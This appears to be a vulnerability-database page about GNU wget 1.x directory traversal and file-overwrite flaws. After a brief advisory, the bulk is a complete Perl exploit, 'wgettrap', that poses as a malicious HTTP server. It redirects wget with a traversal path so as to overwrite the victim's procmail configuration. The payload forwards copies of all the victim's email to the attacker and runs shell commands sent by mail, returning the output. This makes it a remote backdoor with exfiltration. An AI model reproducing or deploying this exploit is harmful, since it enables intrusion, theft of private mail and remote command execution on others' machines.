Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

gnu wget 1.x Multiple Vulnerabilities

🗓️ 01 Jul 2014 00:00:00Reported by RootType 
seebug
 seebug🔗 www.seebug.org👁 17 Views

GNU wget 1.x Multiple Vulnerabilities. Remote attackers can execute arbitrary file overwriting, directory traversal & malicious character input to corrupt files, cause denial of service & launch further attacks

Code

                                                source: http://www.securityfocus.com/bid/11871/info

Multiple remote vulnerabilities reportedly affect GNU wget. These issues are due to the application's failure to properly sanitize user-supplied input and to properly validate the presence of files before writing to them. The issues include:

- a potential directory-traversal issue
- an arbitrary file-overwriting vulnerability
- a weakness caused by the application's failure to filter potentially malicious characters from server-supplied input. 

Via a malicious server, an attacker may exploit these issues to arbitrarily overwrite files within the current directory and potentially outside of it. This may let the attacker corrupt files, cause a denial of service, and possibly launch further attacks against the affected computer. Overwriting of files would take place with the privileges of the user that activates the vulnerable application.


--
 )^o-o^|    jabber: [email protected]
 | .v  K    e-mail: jjminar FastMail FM
 `  - .'     phone: +44(0)7981 738 696
  \ __/Jan     icq: 345 355 493
 __|o|__Min??  irc: [email protected]

#!/usr/bin/perl -W
# wgettrap.poc -- A POC for the wget(1) directory traversal vulnerability
#
# Copyright 2004 Jan Min???? (jjminar fastmail fm)
# License: Public Domain
#
# When wget connects to us, we send it a HTTP redirect constructed so that wget
# wget will connect the second time, it will be attempting to override
# ~/.procm4ilrc (well, provided that the user running wget has username 'jan'
# 8-)).

use POSIX qw(strftime);

# This is our scheme/host/port
$server = "http://localhost:31340";
# Use this + DNS poisoning with wget 1.9 & CVS
#$server = "http://..";

# Wanna know who got infected?
#$log = "/dev/pts/1";

# The filename we will try to overwrite on the target system
$filename = "/home/jan/.procm4ilrc%00This%20part%20will%20be%20ignored.";

############### Payload #########################################
$email = 'your@mailbox';
$password = 'Pmrpuf ner cevzvgvirf';
$payload = <<EOP;
:0c
| mail -s 'Wgettrap mail copy' $email
:0
* ^X-Wgettrap-Command: shell
* ^X-Wgettrap-Password: $password
| /bin/sh -c '/bin/sh | mail -s "Wgettrap shell output" $email'
EOP
chomp $payload;
############### Payload #########################################

# A simple directory traversal, for greater effect
$trick = "/.." . "%2f.." x 40;

open LOG, ">$log" if $log;

while(<STDIN>){
        print LOG $_ if $log;
        if (/\Q$trick$filename\E/) {
        #if (/%2f/) {
                # We see the filename, so this is the second time
                # they're here.  Time to feed the sploit.
                $second++;
        } elsif (/^Range: bytes=\(33\)-/) {
                # Appending goes like this:
                # (1) Tell'em what you're gonna tell'em
                # (2) Then tell'em just a half
                # (3) Close it
                # (4) Wait
                # (5) They're comin' back, with wget -c
                # (6) Tell'em the sploit
                # (7) Close again
                # (8) Wtf? They're comin' back with wget -c again
                # (9) Tell'em the rest...
                # (10) ... enjoying the backdoor at the same time
                print LOG "File if $1 bytes long\n" if $log;
        } elsif (/^\r?$/) {
                # The HTTP headers are over.  Let's do it!
                $date = strftime ("%a, %e %b %Y %H:%M:%S %z", localtime);
                if (!$second) {
                        # Print the payload
                        print <<EOT;
HTTP/1.1 301 Moved Permanently\r
Date: $date\r
Server: wgettrap 1.1\r
Accept-Ranges: bytes\r
Location: $server$trick$filename\r
Content-Length: 43\r
Connection: close\r
Content-Type: text/html\r
\r
<html><head><title></title></head></html>\r
EOT
                } else {
                        # Print the redirection
                        print <<EOT;
HTTP/1.1 200 OK\r
Date: $date\r
Server: wgettrap 1.1\r
Accept-Ranges: bytes\r
Content-Length: 25\r
Connection: close\r
Content-Type: text/plain\r
\r
$payload
EOT
                }
                exit 0;
        }
}

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
01 Jul 2014 00:00Current
7.1High risk
Vulners AI Score7.1
vulnerabilitiesremote exploitationarbitrary overwritingdirectory traversalmalicious inputfile corruptiondenial of serviceattack launch
17